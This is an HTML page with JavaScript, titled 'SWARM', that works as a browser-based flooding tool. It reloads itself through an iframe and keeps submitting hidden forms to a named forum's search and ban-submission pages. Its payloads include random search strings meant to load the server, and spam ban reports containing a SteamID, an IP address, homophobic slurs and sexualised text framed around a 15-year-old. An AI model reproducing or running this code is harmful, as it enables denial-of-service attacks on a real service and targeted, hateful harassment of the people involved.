<html>
<head>
<style>
body {
    background: #000;
	color: #FFF;
}

#content {
    width: 50%;
	margin: auto;
}
</style>
</head>
<body>
<div id="content">
<h1>SWARM<h1>
<h2>Currently Serving: <span id="target"></h2>
<p>Requests: <span id="count">0</span></p>
<iframe name="output" id="output" onload="createForm()"></iframe>
</div>
<script>

var targets = {"targets":[
{
    "host":"http://blankservers.net/index.php",
	"method":"post",
	"vars":[
	    {"action":"do_search","postthread":"1","forums":"all","showresults":"threads", "keywords":"RANDOM"}
    ]
 },
{
   "host":"http://blankservers.net/faggots/index.php",
	"method":"get",
	"vars":[
	    {"p":"banlist","postthread":"1", "searchText":"RANDOM"}
    ]
},
{
"host":"http://blankservers.net/faggots/index.php?p=submit",
	"method":"post",
	"vars":[{
	    "subban":"1","SteamID":"STEAM_0:0:19295617","BanIP":"71.193.172.243","PlayerName":"TwilightSparkle", "BanReason":"please help me im a furfag wanna yiff i rp 15/m/kitty cat please help me im a furfag wanna yiff i rp 15/m/kitty cat please help me im a furfag wanna yiff i rp 15/m/kitty cat please help me im a furfag wanna yiff i rp 15/m/kitty cat please help me im a furfag wanna yiff i rp 15/m/kitty cat please help me im a furfag wanna yiff i rp 15/m/kitty cat ", "SubmitName":"FurFag","EmailAddr":"tryand@fuck.me","server":"1"
    }]
}
]}
var count = 0;
function createForm() {
var number = Math.floor((Math.random() * targets.targets.length)); 

var action = targets.targets[number].host;
var method = targets.targets[number].method;

document.getElementById("target").innerHTML = action;

// Create form element
form = document.createElement("form");

// Set form attributes
form.action = action;
form.method = method;
form.target = "output";

// Create values
//for(i=0; i<targets.targets[number].vars[0].length; i++) {
for(item in targets.targets[number].vars[0]) {
eval("var value = targets.targets[number].vars[0]."+item);
    //alert(targets.targets[number].vars[0]['SteamId']);
    var name = item;
	//var value = item;
	if(name == "RANDOM") { var name = btoa(Math.random()); }
	if(value == "RANDOM") { var value = btoa(Math.random()); }

    var input = document.createElement("input");
    input.type = "hidden";
    input.name = name;
    input.value = value;

    form.appendChild(input);

}

document.body.appendChild(form);

form.submit();

// Clean up
document.body.removeChild(form);
count++;
document.getElementById("count").innerHTML = count;
} 

</script>
</body>
</html>